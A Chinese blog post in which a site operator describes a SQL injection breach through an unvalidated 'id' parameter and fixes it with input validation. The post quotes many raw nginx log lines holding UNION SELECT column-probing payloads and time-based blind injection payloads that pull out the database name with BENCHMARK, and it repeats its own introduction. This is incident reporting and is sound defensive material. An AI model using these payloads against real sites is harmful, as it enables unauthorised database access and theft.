mysql 数据库信息泄露
2013-02-20 17:48
162 查看
昨天,发现系统被人通过程序漏洞,获取到了数据库的信息,并获取系统的后台登录账号进行了登录。
问题产生的原因是系统一个url存在参数未过滤漏洞,导致别人通过这个url如http://daomain/a.php?xxxxxxxxx&id=23,在通过havij软件获取到了数据库信息。未过滤的参数就是id,在程序中没有做校验。
查找问题的过程,通过分析nginx的log,发现大量如下的代码,其中xxxxxxxxxxx&id=是我的正常的参数
解决办法:
将正常url的参数做了校验,问题解决。
对于被获取到数据库信息的原理可以参考下http://blog.sina.com.cn/s/blog_5ded2e5b01010lkx.html
问题产生的原因是系统一个url存在参数未过滤漏洞,导致别人通过这个url如http://daomain/a.php?xxxxxxxxx&id=23,在通过havij软件获取到了数据库信息。未过滤的参数就是id,在程序中没有做校验。
查找问题的过程,通过分析nginx的log,发现大量如下的代码,其中xxxxxxxxxxx&id=是我的正常的参数
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D116%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D120%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D119%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C91%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C97%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C100%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D102%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D101%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D113%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C124%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D127%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
解决办法:
将正常url的参数做了校验,问题解决。
对于被获取到数据库信息的原理可以参考下http://blog.sina.com.cn/s/blog_5ded2e5b01010lkx.html
相关文章推荐
- MySQL,查看数据库的信息,大小,最后修改时间等
- Oracle SQLServer MySQL查看当前所有数据库表名及其他信息
- MYSQL-INFORMATION_SCHEMA信息数据库(MYSQL注入猜解)
- 世纪佳缘信息爬取存储到mysql,下载图片到本地,从数据库选取账号对其发送消息更新发信状态
- (IP|短信中心号|手机号码)解析成省份城市信息数据库[MySQL版]
- 6、MySQL 8.0参考手册 获取有关数据库和表格的信息
- mysql 查看数据库信息、表大小
- Mysql获取数据库的所有表,以及表所有字段信息
- 某成教管理CMS系统数据库连接信息泄露
- spring中配置log4j,并将log信息存储在数据库中(以mysql为例)
- freeswitch 把SIP注册信息数据库从SQLITE 改为MYSQL的方法
- Mysql信息数据库:Information_schema
- 用sql语句取出mysql 数据库中表的字段的说明信息
- spring中配置MySql数据源,怎样配置数据库信息
- 使用 Navicat 连接 MySQL ,已存在的数据库中 comment 中文信息乱码的解决办法
- mysql查询当前数据库所有 的表基本信息
- MySQL入门--创建数据库、显示警告信息、显示数据库、显示数据库创建信息、指定字符编码集
- Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
- mysql+jsp,在jsp页面连接了数据库,已成功获取数据库字段,请问如何取到当前用户对应的信息
- MySQL 显示数据库及表信息